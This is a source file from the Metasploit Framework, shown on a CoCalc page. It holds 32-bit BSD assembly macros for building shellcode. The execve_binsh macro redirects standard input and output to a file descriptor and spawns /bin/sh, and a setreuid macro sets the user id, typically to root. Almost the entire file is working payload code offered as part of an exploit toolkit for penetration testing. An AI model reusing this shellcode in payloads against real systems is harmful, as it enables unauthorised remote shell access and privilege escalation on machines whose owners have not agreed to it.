CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/bsd/ia32/generic.asm
Views: 11784
1
;;

2
;

3
;        Name: generic

4
;        Type: Macro Set

5
;   Qualities: None

6
;     Authors: skape <mmiller [at] hick.org>

7
;     Version: $Revision: 1628 $

8
;     License: 

9
;

10
;        This file is part of the Metasploit Exploit Framework

11
;        and is subject to the same licenses and copyrights as

12
;        the rest of this package.

13
;

14
; Description:

15
;

16
;        This file provides a generic API of macros that can be used

17
;        by payloads.  No payloads are actually implemented within this

18
;        file.

19
;

20
; Macro List:

21
;

22
;        execve_binsh - Executes a command shell with flags

23
;        setreuid     - Set real/effective user id

24
;;

25
BITS 32

26


27
;;

28
; Define undefined assumptions

29
;;

30
%ifndef ASSUME_REG_EDX

31
%define ASSUME_REG_EDX -1

32
%endif

33
%ifndef ASSUME_REG_EAX

34
%define ASSUME_REG_EAX -1

35
%endif

36


37
;;

38
;     Macro: execve_binsh

39
;   Purpose: Execute a command shell with various options

40
; Arguments:

41
;

42
;    Execution flags: Flags used for executing the command shell in a 

43
;                     number of modes.

44
;

45
;        EXECUTE_REDIRECT_IO      => Redirects stdin/stdout/stderr to the fd

46
;                                    passed in 'edi'.

47
;;

48
%define EXECUTE_REDIRECT_IO      0x0001

49


50
%macro execve_binsh 1

51


52
	%if %1 & EXECUTE_REDIRECT_IO

53


54
dup:

55
%if ASSUME_REG_EDX != 2

56
	push byte 0x2

57
	pop  ecx

58
%endif

59
dup_loop:

60
%if ASSUME_REG_EAX == 0

61
	mov  al, 0x5a

62
%else

63
	push byte 0x5a

64
	pop  eax

65
%endif

66
%if ASSUME_REG_EDX == 2

67
	push edx

68
%else

69
	push ecx

70
%endif

71
%ifdef FD_REG_EBX

72
	push ebx

73
%else

74
	push edi

75
%endif

76
%if ASSUME_REG_EDX == 2

77
	push edx

78
%else

79
	push ecx

80
%endif

81
	int  0x80

82
%if ASSUME_REG_EDX == 2

83
	dec  edx

84
%else

85
	dec  ecx

86
%endif

87
	jns  dup_loop

88


89
	%undef  ASSUME_REG_EAX

90
	%define ASSUME_REG_EAX 0

91


92
	%endif

93


94
execve:

95
%if ASSUME_REG_EAX == 0

96
	push eax

97
%else

98
	push byte 0x3b

99
	pop  eax

100
	cdq

101
	push edx

102
%endif

103
	push dword 0x68732f2f

104
	push dword 0x6e69622f

105
	mov  ebx, esp

106
%if ASSUME_REG_EAX == 0

107
	push eax

108
%else

109
	push edx

110
%endif

111
	push esp

112
	push ebx

113
	push ebx

114
%if ASSUME_REG_EAX == 0

115
	mov  al, 0x3b

116
%endif

117
	int  0x80

118


119
%endmacro

120


121
;;

122
;     Macro: setreuid

123
;   Purpose: Set effective user id

124
; Arguments:

125
;

126
;    User ID: The user identifier to setreuid to, typically 0.

127
;;

128


129
%macro setreuid 1

130


131
setreuid:

132


133
	%if %1 == 0

134


135
	xor  eax, eax

136


137
	%else

138


139
		%if %1 < 256

140


141
		push byte %1

142


143
		%else

144


145
		push dword %1

146


147
		%endif

148


149
	pop  eax

150


151
	%endif

152


153
	push eax

154
	push eax

155
	mov  al, 0x7e

156
	push eax

157
	int  0x80

158


159
%endmacro

160


161